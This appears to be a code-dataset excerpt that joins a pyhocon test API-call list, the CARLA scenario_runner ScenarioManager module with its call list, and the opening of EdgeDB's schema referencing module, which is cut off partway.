((35098, 35133), 'pytest.raises', 'pytest.raises', (['ParseSyntaxException'], {}), '(ParseSyntaxException)\n', (35111, 35133), False, 'import pytest\n'), ((35147, 35295), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = {\n f: 5\n g\n }\n """'], {}), '(\n """\n a = {\n f: 5\n g\n }\n """\n )\n', (35173, 35295), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((35317, 35352), 'pytest.raises', 'pytest.raises', (['ParseSyntaxException'], {}), '(ParseSyntaxException)\n', (35330, 35352), False, 'import pytest\n'), ((35366, 35403), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a = {g}"""'], {}), "('a = {g}')\n", (35392, 35403), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((35451, 35483), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', (['"""w"""'], {}), "('w')\n", (35478, 35483), False, 'import tempfile\n'), ((37360, 37382), 'pytest.raises', 'pytest.raises', (['IOError'], {}), '(IOError)\n', (37373, 37382), False, 'import pytest\n'), ((37396, 37590), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: [\n include required("dummy.txt")\n 3\n 4\n ]\n """'], {}), '(\n """\n a: [\n include required("dummy.txt")\n 3\n 4\n ]\n """\n )\n', (37422, 37590), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((37828, 37853), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (37841, 37853), False, 'import pytest\n'), ((37867, 37928), 'pyhocon.ConfigParser.resolve_package_path', 'ConfigParser.resolve_package_path', (['"""pyhocon/config_parser.py"""'], {}), 
"('pyhocon/config_parser.py')\n", (37900, 37928), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((37992, 38018), 'pytest.raises', 'pytest.raises', (['ImportError'], {}), '(ImportError)\n', (38005, 38018), False, 'import pytest\n'), ((38032, 38095), 'pyhocon.ConfigParser.resolve_package_path', 'ConfigParser.resolve_package_path', (['"""non_existent_module:foo.py"""'], {}), "('non_existent_module:foo.py')\n", (38065, 38095), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((38227, 38262), 'os.path.join', 'os.path.join', (['temp_dir', '"""my_module"""'], {}), "(temp_dir, 'my_module')\n", (38239, 38262), False, 'import os\n'), ((38289, 38324), 'os.path.join', 'os.path.join', (['module_dir', '"""my.conf"""'], {}), "(module_dir, 'my.conf')\n", (38301, 38324), False, 'import os\n'), ((38418, 38438), 'os.mkdir', 'os.mkdir', (['module_dir'], {}), '(module_dir)\n', (38426, 38438), False, 'import os\n'), ((38829, 38985), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: 1\n b: 2\n include package("my_module:my.conf")\n """'], {}), '(\n """\n a: 1\n b: 2\n include package("my_module:my.conf")\n """\n )\n', (38855, 38985), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((39192, 39235), 'shutil.rmtree', 'shutil.rmtree', (['temp_dir'], {'ignore_errors': '(True)'}), '(temp_dir, ignore_errors=True)\n', (39205, 39235), False, 'import shutil\n'), ((39397, 39429), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', (['"""w"""'], {}), "('w')\n", (39424, 39429), False, 'import tempfile\n'), ((40494, 40526), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', (['"""w"""'], {}), "('w')\n", (40521, 40526), False, 'import tempfile\n'), ((40940, 40972), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', (['"""w"""'], {}), "('w')\n", (40967, 40972), False, 'import tempfile\n'), ((41076, 41281), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['("""\n {\n a : { include """ + \'"\' + fdin.\n name +\n """" }\n a : { x : 42 }\n }\n """\n )'], {}), '(\n """\n {\n a : { include """ + \'"\' +\n fdin.name +\n """" }\n a : { x : 42 }\n }\n """\n )\n', (41102, 41281), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((45054, 45096), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (45067, 45096), False, 'import pytest\n'), ((45110, 45246), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = ${b}\n b = ${c}\n c = ${a}\n """'], {}), '(\n """\n a = ${b}\n b = ${c}\n c = ${a}\n """\n )\n', (45136, 45246), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((60042, 60072), 'pytest.raises', 'pytest.raises', (['ConfigException'], {}), '(ConfigException)\n', (60055, 60072), False, 'import pytest\n'), ((64452, 64491), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (64465, 64491), False, 'import pytest\n'), ((64578, 64615), 'pytest.raises', 'pytest.raises', (['ConfigMissingException'], {}), '(ConfigMissingException)\n', (64591, 64615), False, 'import pytest\n'), ((64686, 64716), 'pytest.raises', 'pytest.raises', (['ConfigException'], {}), '(ConfigException)\n', (64699, 64716), False, 'import pytest\n'), ((64789, 64819), 'pytest.raises', 
'pytest.raises', (['ConfigException'], {}), '(ConfigException)\n', (64802, 64819), False, 'import pytest\n'), ((64892, 64922), 'pytest.raises', 'pytest.raises', (['ConfigException'], {}), '(ConfigException)\n', (64905, 64922), False, 'import pytest\n'), ((64997, 65036), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (65010, 65036), False, 'import pytest\n'), ((69051, 69069), 'json.loads', 'json.loads', (['source'], {}), '(source)\n', (69061, 69069), False, 'import json\n'), ((3276, 3293), 'datetime.timedelta', 'period', ([], {'minutes': '(1)'}), '(minutes=1)\n', (3282, 3293), True, 'from datetime import timedelta as period\n'), ((3320, 3337), 'datetime.timedelta', 'period', ([], {'minutes': '(1)'}), '(minutes=1)\n', (3326, 3337), True, 'from datetime import timedelta as period\n'), ((3364, 3381), 'datetime.timedelta', 'period', ([], {'minutes': '(2)'}), '(minutes=2)\n', (3370, 3381), True, 'from datetime import timedelta as period\n'), ((3403, 3420), 'datetime.timedelta', 'period', ([], {'minutes': '(3)'}), '(minutes=3)\n', (3409, 3420), True, 'from datetime import timedelta as period\n'), ((3441, 3458), 'datetime.timedelta', 'period', ([], {'minutes': '(3)'}), '(minutes=3)\n', (3447, 3458), True, 'from datetime import timedelta as period\n'), ((3518, 3535), 'datetime.timedelta', 'period', ([], {'seconds': '(4)'}), '(seconds=4)\n', (3524, 3535), True, 'from datetime import timedelta as period\n'), ((3562, 3579), 'datetime.timedelta', 'period', ([], {'seconds': '(5)'}), '(seconds=5)\n', (3568, 3579), True, 'from datetime import timedelta as period\n'), ((3601, 3618), 'datetime.timedelta', 'period', ([], {'seconds': '(6)'}), '(seconds=6)\n', (3607, 3618), True, 'from datetime import timedelta as period\n'), ((3676, 3691), 'datetime.timedelta', 'period', ([], {'hours': '(7)'}), '(hours=7)\n', (3682, 3691), True, 'from datetime import timedelta as period\n'), ((3716, 3731), 'datetime.timedelta', 'period', ([], {'hours': '(8)'}), '(hours=8)\n', (3722, 3731), True, 'from datetime import timedelta as period\n'), ((3753, 3768), 'datetime.timedelta', 'period', ([], {'hours': '(9)'}), '(hours=9)\n', (3759, 3768), True, 'from datetime import timedelta as period\n'), ((3796, 3812), 'datetime.timedelta', 'period', ([], {'weeks': '(10)'}), '(weeks=10)\n', (3802, 3812), True, 'from datetime import timedelta as period\n'), ((3838, 3854), 'datetime.timedelta', 'period', ([], {'weeks': '(11)'}), '(weeks=11)\n', (3844, 3854), True, 'from datetime import timedelta as period\n'), ((3877, 3893), 'datetime.timedelta', 'period', ([], {'weeks': '(12)'}), '(weeks=12)\n', (3883, 3893), True, 'from datetime import timedelta as period\n'), ((3920, 3935), 'datetime.timedelta', 'period', ([], {'days': '(10)'}), '(days=10)\n', (3926, 3935), True, 'from datetime import timedelta as period\n'), ((3960, 3975), 'datetime.timedelta', 'period', ([], {'days': '(11)'}), '(days=11)\n', (3966, 3975), True, 'from datetime import timedelta as period\n'), ((3998, 4013), 'datetime.timedelta', 'period', ([], {'days': '(12)'}), '(days=12)\n', (4004, 4013), True, 'from datetime import timedelta as period\n'), ((4049, 4073), 'datetime.timedelta', 'period', ([], {'microseconds': '(110)'}), '(microseconds=110)\n', (4055, 4073), True, 'from datetime import timedelta as period\n'), ((4107, 4131), 'datetime.timedelta', 'period', ([], {'microseconds': '(111)'}), '(microseconds=111)\n', (4113, 4131), True, 'from datetime import timedelta as period\n'), ((4160, 4184), 'datetime.timedelta', 
'period', ([], {'microseconds': '(112)'}), '(microseconds=112)\n', (4166, 4184), True, 'from datetime import timedelta as period\n'), ((4212, 4236), 'datetime.timedelta', 'period', ([], {'microseconds': '(113)'}), '(microseconds=113)\n', (4218, 4236), True, 'from datetime import timedelta as period\n'), ((4261, 4285), 'datetime.timedelta', 'period', ([], {'microseconds': '(114)'}), '(microseconds=114)\n', (4267, 4285), True, 'from datetime import timedelta as period\n'), ((4321, 4348), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': '(110)'}), '(milliseconds=110)\n', (4330, 4348), False, 'from datetime import timedelta\n'), ((4382, 4409), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': '(111)'}), '(milliseconds=111)\n', (4391, 4409), False, 'from datetime import timedelta\n'), ((4438, 4465), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': '(112)'}), '(milliseconds=112)\n', (4447, 4465), False, 'from datetime import timedelta\n'), ((4493, 4520), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': '(113)'}), '(milliseconds=113)\n', (4502, 4520), False, 'from datetime import timedelta\n'), ((4545, 4572), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': '(114)'}), '(milliseconds=114)\n', (4554, 4572), False, 'from datetime import timedelta\n'), ((4607, 4629), 'datetime.timedelta', 'period', ([], {'microseconds': '(0)'}), '(microseconds=0)\n', (4613, 4629), True, 'from datetime import timedelta as period\n'), ((4665, 4688), 'datetime.timedelta', 'period', ([], {'microseconds': '(11)'}), '(microseconds=11)\n', (4671, 4688), True, 'from datetime import timedelta as period\n'), ((4725, 4750), 'datetime.timedelta', 'period', ([], {'microseconds': '(1110)'}), '(microseconds=1110)\n', (4731, 4750), True, 'from datetime import timedelta as period\n'), ((4782, 4807), 'datetime.timedelta', 'period', ([], {'microseconds': '(1120)'}), '(microseconds=1120)\n', (4788, 4807), True, 'from datetime import timedelta as period\n'), ((4838, 4863), 'datetime.timedelta', 'period', ([], {'microseconds': '(1130)'}), '(microseconds=1130)\n', (4844, 4863), True, 'from datetime import timedelta as period\n'), ((4892, 4917), 'datetime.timedelta', 'period', ([], {'microseconds': '(1140)'}), '(microseconds=1140)\n', (4898, 4917), True, 'from datetime import timedelta as period\n'), ((5639, 5655), 'datetime.timedelta', 'period', ([], {'weeks': '(10)'}), '(weeks=10)\n', (5645, 5655), True, 'from datetime import timedelta as period\n'), ((5657, 5674), 'datetime.timedelta', 'period', ([], {'minutes': '(5)'}), '(minutes=5)\n', (5663, 5674), True, 'from datetime import timedelta as period\n'), ((69198, 69221), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'months': '(1)'}), '(months=1)\n', (69211, 69221), False, 'from dateutil.relativedelta import relativedelta\n'), ((69247, 69270), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'months': '(1)'}), '(months=1)\n', (69260, 69270), False, 'from dateutil.relativedelta import relativedelta\n'), ((69296, 69319), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'months': '(2)'}), '(months=2)\n', (69309, 69319), False, 'from dateutil.relativedelta import relativedelta\n'), ((69342, 69365), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'months': '(3)'}), '(months=3)\n', (69355, 69365), False, 'from dateutil.relativedelta import relativedelta\n'), ((69387, 69410), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'months': '(3)'}), '(months=3)\n', (69400, 69410), False, 
'from dateutil.relativedelta import relativedelta\n'), ((69468, 69490), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'years': '(1)'}), '(years=1)\n', (69481, 69490), False, 'from dateutil.relativedelta import relativedelta\n'), ((69515, 69537), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'years': '(1)'}), '(years=1)\n', (69528, 69537), False, 'from dateutil.relativedelta import relativedelta\n'), ((69562, 69584), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'years': '(2)'}), '(years=2)\n', (69575, 69584), False, 'from dateutil.relativedelta import relativedelta\n'), ((69606, 69628), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'years': '(3)'}), '(years=3)\n', (69619, 69628), False, 'from dateutil.relativedelta import relativedelta\n'), ((69649, 69671), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'years': '(3)'}), '(years=3)\n', (69662, 69671), False, 'from dateutil.relativedelta import relativedelta\n'), ((38456, 38495), 'os.path.join', 'os.path.join', (['module_dir', '"""__init__.py"""'], {}), "(module_dir, '__init__.py')\n", (38468, 38495), False, 'import os\n'), ((44020, 44071), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a=${b}"""'], {'resolve': '(False)'}), "('a=${b}', resolve=False)\n", (44046, 44071), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n')]
cgeller/WorldOnRails
scenario_runner/srunner/scenariomanager/scenario_manager.py
d8aa9f7ae67a6b7b71a2fc5ba86bb2a44f221bef
#!/usr/bin/env python # Copyright (c) 2018-2020 Intel Corporation # # This work is licensed under the terms of the MIT license. # For a copy, see <https://opensource.org/licenses/MIT>. """ This module provides the ScenarioManager implementation. It must not be modified and is for reference only! """ from __future__ import print_function import sys import time import py_trees from srunner.autoagents.agent_wrapper import AgentWrapper from srunner.scenariomanager.carla_data_provider import CarlaDataProvider from srunner.scenariomanager.result_writer import ResultOutputProvider from srunner.scenariomanager.timer import GameTime from srunner.scenariomanager.watchdog import Watchdog class ScenarioManager(object): """ Basic scenario manager class. This class holds all functionality required to start, and analyze a scenario. The user must not modify this class. To use the ScenarioManager: 1. Create an object via manager = ScenarioManager() 2. Load a scenario via manager.load_scenario() 3. Trigger the execution of the scenario manager.run_scenario() This function is designed to explicitly control start and end of the scenario execution 4. Trigger a result evaluation with manager.analyze_scenario() 5. If needed, cleanup with manager.stop_scenario() """ def __init__(self, debug_mode=False, sync_mode=False, timeout=2.0): """ Setups up the parameters, which will be filled at load_scenario() """ self.scenario = None self.scenario_tree = None self.scenario_class = None self.ego_vehicles = None self.other_actors = None self._debug_mode = debug_mode self._agent = None self._sync_mode = sync_mode self._running = False self._timestamp_last_run = 0.0 self._timeout = timeout self._watchdog = Watchdog(float(self._timeout)) self.scenario_duration_system = 0.0 self.scenario_duration_game = 0.0 self.start_system_time = None self.end_system_time = None def _reset(self): """ Reset all parameters """ self._running = False self._timestamp_last_run = 0.0 self.scenario_duration_system = 0.0 self.scenario_duration_game = 0.0 self.start_system_time = None self.end_system_time = None GameTime.restart() def cleanup(self): """ This function triggers a proper termination of a scenario """ if self.scenario is not None: self.scenario.terminate() if self._agent is not None: self._agent.cleanup() self._agent = None CarlaDataProvider.cleanup() def load_scenario(self, scenario, agent=None): """ Load a new scenario """ self._reset() self._agent = AgentWrapper(agent) if agent else None if self._agent is not None: self._sync_mode = True self.scenario_class = scenario self.scenario = scenario.scenario self.scenario_tree = self.scenario.scenario_tree self.ego_vehicles = scenario.ego_vehicles self.other_actors = scenario.other_actors # To print the scenario tree uncomment the next line # py_trees.display.render_dot_tree(self.scenario_tree) if self._agent is not None: self._agent.setup_sensors(self.ego_vehicles[0], self._debug_mode) def run_scenario(self): """ Trigger the start of the scenario and wait for it to finish/fail """ print("ScenarioManager: Running scenario {}".format(self.scenario_tree.name)) self.start_system_time = time.time() start_game_time = GameTime.get_time() self._watchdog.start() self._running = True while self._running: timestamp = None world = CarlaDataProvider.get_world() if world: snapshot = world.get_snapshot() if snapshot: timestamp = snapshot.timestamp if timestamp: self._tick_scenario(timestamp) self._watchdog.stop() self.cleanup() self.end_system_time = time.time() end_game_time = GameTime.get_time() 
self.scenario_duration_system = self.end_system_time - \ self.start_system_time self.scenario_duration_game = end_game_time - start_game_time if self.scenario_tree.status == py_trees.common.Status.FAILURE: print("ScenarioManager: Terminated due to failure") def _tick_scenario(self, timestamp): """ Run next tick of scenario and the agent. If running synchornously, it also handles the ticking of the world. """ if self._timestamp_last_run < timestamp.elapsed_seconds and self._running: self._timestamp_last_run = timestamp.elapsed_seconds self._watchdog.update() if self._debug_mode: print("\n--------- Tick ---------\n") # Update game time and actor information GameTime.on_carla_tick(timestamp) CarlaDataProvider.on_carla_tick() if self._agent is not None: ego_action = self._agent() # Tick scenario self.scenario_tree.tick_once() if self._debug_mode: print("\n") py_trees.display.print_ascii_tree(self.scenario_tree, show_status=True) sys.stdout.flush() if self.scenario_tree.status != py_trees.common.Status.RUNNING: self._running = False if self._agent is not None: self.ego_vehicles[0].apply_control(ego_action) if self._sync_mode and self._running and self._watchdog.get_status(): CarlaDataProvider.get_world().tick() def get_running_status(self): """ returns: bool: False if watchdog exception occured, True otherwise """ return self._watchdog.get_status() def stop_scenario(self): """ This function is used by the overall signal handler to terminate the scenario execution """ self._running = False def analyze_scenario(self, stdout, filename, junit): """ This function is intended to be called from outside and provide the final statistics about the scenario (human-readable, in form of a junit report, etc.) """ failure = False timeout = False result = "SUCCESS" if self.scenario.test_criteria is None: print("Nothing to analyze, this scenario has no criteria") return True for criterion in self.scenario.get_criteria(): if (not criterion.optional and criterion.test_status != "SUCCESS" and criterion.test_status != "ACCEPTABLE"): failure = True result = "FAILURE" elif criterion.test_status == "ACCEPTABLE": result = "ACCEPTABLE" if self.scenario.timeout_node.timeout and not failure: timeout = True result = "TIMEOUT" output = ResultOutputProvider(self, result, stdout, filename, junit) output.write() return failure or timeout
[((2400, 2418), 'srunner.scenariomanager.timer.GameTime.restart', 'GameTime.restart', ([], {}), '()\n', (2416, 2418), False, 'from srunner.scenariomanager.timer import GameTime\n'), ((2721, 2748), 'srunner.scenariomanager.carla_data_provider.CarlaDataProvider.cleanup', 'CarlaDataProvider.cleanup', ([], {}), '()\n', (2746, 2748), False, 'from srunner.scenariomanager.carla_data_provider import CarlaDataProvider\n'), ((3730, 3741), 'time.time', 'time.time', ([], {}), '()\n', (3739, 3741), False, 'import time\n'), ((3768, 3787), 'srunner.scenariomanager.timer.GameTime.get_time', 'GameTime.get_time', ([], {}), '()\n', (3785, 3787), False, 'from srunner.scenariomanager.timer import GameTime\n'), ((4268, 4279), 'time.time', 'time.time', ([], {}), '()\n', (4277, 4279), False, 'import time\n'), ((4304, 4323), 'srunner.scenariomanager.timer.GameTime.get_time', 'GameTime.get_time', ([], {}), '()\n', (4321, 4323), False, 'from srunner.scenariomanager.timer import GameTime\n'), ((7298, 7357), 'srunner.scenariomanager.result_writer.ResultOutputProvider', 'ResultOutputProvider', (['self', 'result', 'stdout', 'filename', 'junit'], {}), '(self, result, stdout, filename, junit)\n', (7318, 7357), False, 'from srunner.scenariomanager.result_writer import ResultOutputProvider\n'), ((2897, 2916), 'srunner.autoagents.agent_wrapper.AgentWrapper', 'AgentWrapper', (['agent'], {}), '(agent)\n', (2909, 2916), False, 'from srunner.autoagents.agent_wrapper import AgentWrapper\n'), ((3928, 3957), 'srunner.scenariomanager.carla_data_provider.CarlaDataProvider.get_world', 'CarlaDataProvider.get_world', ([], {}), '()\n', (3955, 3957), False, 'from srunner.scenariomanager.carla_data_provider import CarlaDataProvider\n'), ((5163, 5196), 'srunner.scenariomanager.timer.GameTime.on_carla_tick', 'GameTime.on_carla_tick', (['timestamp'], {}), '(timestamp)\n', (5185, 5196), False, 'from srunner.scenariomanager.timer import GameTime\n'), ((5209, 5242), 'srunner.scenariomanager.carla_data_provider.CarlaDataProvider.on_carla_tick', 'CarlaDataProvider.on_carla_tick', ([], {}), '()\n', (5240, 5242), False, 'from srunner.scenariomanager.carla_data_provider import CarlaDataProvider\n'), ((5477, 5548), 'py_trees.display.print_ascii_tree', 'py_trees.display.print_ascii_tree', (['self.scenario_tree'], {'show_status': '(True)'}), '(self.scenario_tree, show_status=True)\n', (5510, 5548), False, 'import py_trees\n'), ((5565, 5583), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (5581, 5583), False, 'import sys\n'), ((5894, 5923), 'srunner.scenariomanager.carla_data_provider.CarlaDataProvider.get_world', 'CarlaDataProvider.get_world', ([], {}), '()\n', (5921, 5923), False, 'from srunner.scenariomanager.carla_data_provider import CarlaDataProvider\n')]
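The ScenarioManager docstring above spells out a five-step usage protocol (create, load_scenario, run_scenario, analyze_scenario, optional stop_scenario). A minimal driver sketch of that flow, assuming a scenario and agent have already been built elsewhere with scenario_runner (`my_scenario` and `my_agent` are placeholders, not part of this module):

# Hypothetical driver following the five steps from the ScenarioManager docstring.
from srunner.scenariomanager.scenario_manager import ScenarioManager

def execute(my_scenario, my_agent=None):
    manager = ScenarioManager(debug_mode=False, sync_mode=True, timeout=2.0)  # 1. create the manager
    manager.load_scenario(my_scenario, agent=my_agent)                   # 2. load the scenario
    manager.run_scenario()                                               # 3. run until the scenario tree finishes
    failed_or_timed_out = manager.analyze_scenario(                     # 4. evaluate the test criteria
        stdout=True, filename=None, junit=None)
    manager.stop_scenario()                                              # 5. explicit termination hook, if needed
    return not failed_or_timed_out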
disfated/edgedb
edb/schema/referencing.py
8d78f4a2a578f80780be160ba5f107f5bdc79063
# # This source file is part of the EdgeDB open source project. # # Copyright 2008-present MagicStack Inc. and the EdgeDB authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from __future__ import annotations from typing import * import hashlib from edb import errors from edb.common import struct from edb.edgeql import ast as qlast from . import delta as sd from . import inheriting from . import objects as so from . import schema as s_schema from . import name as sn from . import utils ReferencedT = TypeVar('ReferencedT', bound='ReferencedObject') ReferencedInheritingObjectT = TypeVar('ReferencedInheritingObjectT', bound='ReferencedInheritingObject') class ReferencedObject(so.DerivableObject): #: True if the object has an explicit definition and is not #: purely inherited. is_local = so.SchemaField( bool, default=False, inheritable=False, compcoef=0.909, reflection_method=so.ReflectionMethod.AS_LINK, ) def get_subject(self, schema: s_schema.Schema) -> Optional[so.Object]: # NB: classes that inherit ReferencedObject define a `get_subject` # method dynamically, with `subject = SchemaField` raise NotImplementedError def get_referrer(self, schema: s_schema.Schema) -> Optional[so.Object]: return self.get_subject(schema) def delete(self, schema: s_schema.Schema) -> s_schema.Schema: cmdcls = sd.ObjectCommandMeta.get_command_class_or_die( sd.DeleteObject, type(self)) cmd = cmdcls(classname=self.get_name(schema)) context = sd.CommandContext( modaliases={}, schema=schema, disable_dep_verification=True, ) delta, parent_cmd = cmd._build_alter_cmd_stack( schema, context, self) parent_cmd.add(cmd) with context(sd.DeltaRootContext(schema=schema, op=delta)): schema = delta.apply(schema, context) return schema def derive_ref( self: ReferencedT, schema: s_schema.Schema, referrer: so.QualifiedObject, *qualifiers: str, mark_derived: bool = False, attrs: Optional[Dict[str, Any]] = None, dctx: Optional[sd.CommandContext] = None, derived_name_base: Optional[str] = None, inheritance_merge: bool = True, preserve_path_id: Optional[bool] = None, refdict_whitelist: Optional[AbstractSet[str]] = None, transient: bool = False, name: Optional[str] = None, **kwargs: Any, ) -> Tuple[s_schema.Schema, ReferencedT]: if name is None: derived_name: str = self.get_derived_name( schema, referrer, *qualifiers, mark_derived=mark_derived, derived_name_base=derived_name_base) else: derived_name = name if self.get_name(schema) == derived_name: raise errors.SchemaError( f'cannot derive {self!r}({derived_name}) from itself') derived_attrs: Dict[str, object] = {} if attrs is not None: derived_attrs.update(attrs) derived_attrs['name'] = derived_name derived_attrs['bases'] = so.ObjectList.create( schema, [self]) mcls = type(self) referrer_class = type(referrer) refdict = referrer_class.get_refdict_for_class(mcls) reftype = referrer_class.get_field(refdict.attr).type refname = reftype.get_key_for_name(schema, derived_name) refcoll = referrer.get_field_value(schema, refdict.attr) existing = refcoll.get(schema, refname, default=None) if existing is 
not None: cmdcls: Type[sd.Command] = \ sd.ObjectCommandMeta.get_command_class_or_die(sd.AlterObject, type(self)) else: cmdcls = sd.ObjectCommandMeta.get_command_class_or_die( sd.CreateObject, type(self)) cmd = cmdcls(classname=derived_name) for k, v in derived_attrs.items(): cmd.set_attribute_value(k, v) if existing is not None: new_bases = derived_attrs['bases'] old_bases = existing.get_bases(schema) if new_bases != old_bases: assert isinstance(new_bases, so.ObjectList) removed_bases, added_bases = inheriting.delta_bases( [b.get_name(schema) for b in old_bases.objects(schema)], [b.get_name(schema) for b in new_bases.objects(schema)], ) rebase_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die( inheriting.RebaseInheritingObject, type(self)) rebase_cmd = rebase_cmdcls( classname=derived_name, added_bases=added_bases, removed_bases=removed_bases, ) cmd.add(rebase_cmd) context = sd.CommandContext( modaliases={}, schema=schema, ) assert isinstance(cmd, sd.ObjectCommand) delta, parent_cmd = cmd._build_alter_cmd_stack( schema, context, self, referrer=referrer) with context(sd.DeltaRootContext(schema=schema, op=delta)): if not inheritance_merge: context.current().inheritance_merge = False if refdict_whitelist is not None: context.current().inheritance_refdicts = refdict_whitelist if mark_derived: context.current().mark_derived = True if transient: context.current().transient_derivation = True if preserve_path_id: context.current().preserve_path_id = True parent_cmd.add(cmd) schema = delta.apply(schema, context) derived: ReferencedT = schema.get(derived_name) return schema, derived def get_verbosename( self, schema: s_schema.Schema, *, with_parent: bool = False, ) -> str: vn = super().get_verbosename(schema) if with_parent: subject = self.get_subject(schema) if subject is not None: pn = subject.get_verbosename(schema, with_parent=True) return f'{vn} of {pn}' return vn class ReferencedInheritingObject( so.DerivableInheritingObject, ReferencedObject, ): # Indicates that the object has been declared as # explicitly inherited. 
declared_overloaded = so.SchemaField( bool, default=False, compcoef=None, introspectable=False, inheritable=False, ephemeral=True, ) def get_implicit_bases( self: ReferencedInheritingObjectT, schema: s_schema.Schema, ) -> List[ReferencedInheritingObjectT]: return [ b for b in self.get_bases(schema).objects(schema) if not b.generic(schema) ] class ReferencedObjectCommandMeta(sd.ObjectCommandMeta): _transparent_adapter_subclass: ClassVar[bool] = True _referrer_context_class: Optional[ Type[sd.ObjectCommandContext[so.Object]] ] = None def __new__(mcls, name: str, bases: Tuple[type, ...], clsdct: Dict[str, Any], *, referrer_context_class: Optional[ Type[sd.ObjectCommandContext[so.Object]] ] = None, **kwargs: Any ) -> ReferencedObjectCommandMeta: cls = super().__new__(mcls, name, bases, clsdct, **kwargs) assert isinstance(cls, ReferencedObjectCommandMeta) if referrer_context_class is not None: cls._referrer_context_class = referrer_context_class return cls class ReferencedObjectCommandBase( sd.QualifiedObjectCommand[ReferencedT], metaclass=ReferencedObjectCommandMeta, ): @classmethod def get_referrer_context_class( cls, ) -> Type[sd.ObjectCommandContext[so.Object]]: if cls._referrer_context_class is None: raise TypeError( f'referrer_context_class is not defined for {cls}') return cls._referrer_context_class @classmethod def get_referrer_context( cls, context: sd.CommandContext, ) -> Optional[sd.ObjectCommandContext[so.Object]]: """Get the context of the command for the referring object, if any. E.g. for a `create/alter/etc concrete link` command this would be the context of the `create/alter/etc type` command. """ ctxcls = cls.get_referrer_context_class() ctx = context.get(ctxcls) # type: ignore return cast(Optional[sd.ObjectCommandContext[so.Object]], ctx) @classmethod def get_referrer_context_or_die( cls, context: sd.CommandContext, ) -> sd.ObjectCommandContext[so.Object]: ctx = cls.get_referrer_context(context) if ctx is None: raise RuntimeError(f'no referrer context for {cls}') return ctx class StronglyReferencedObjectCommand( ReferencedObjectCommandBase[ReferencedT] ): pass class ReferencedObjectCommand(ReferencedObjectCommandBase[ReferencedT]): @classmethod def _classname_from_ast(cls, schema: s_schema.Schema, astnode: qlast.NamedDDL, context: sd.CommandContext ) -> sn.Name: name = super()._classname_from_ast(schema, astnode, context) parent_ctx = cls.get_referrer_context(context) if parent_ctx is not None: assert isinstance(parent_ctx.op, sd.QualifiedObjectCommand) referrer_name = parent_ctx.op.classname base_name: str try: base_ref = utils.ast_to_object( astnode.name, modaliases=context.modaliases, schema=schema, ) except errors.InvalidReferenceError: base_name = sn.Name(name) else: base_name = base_ref.get_name(schema) quals = cls._classname_quals_from_ast( schema, astnode, base_name, referrer_name, context) pnn = sn.get_specialized_name(base_name, referrer_name, *quals) name = sn.Name(name=pnn, module=referrer_name.module) assert isinstance(name, sn.Name) return name @classmethod def _classname_from_name( cls, name: sn.SchemaName, referrer_name: sn.SchemaName, ) -> sn.Name: base_name = sn.shortname_from_fullname(name) quals = cls._classname_quals_from_name(name) pnn = sn.get_specialized_name(base_name, referrer_name, *quals) return sn.Name(name=pnn, module=referrer_name.module) @classmethod def _classname_quals_from_ast( cls, schema: s_schema.Schema, astnode: qlast.NamedDDL, base_name: str, referrer_name: str, context: sd.CommandContext, ) -> Tuple[str, ...]: return () @classmethod 
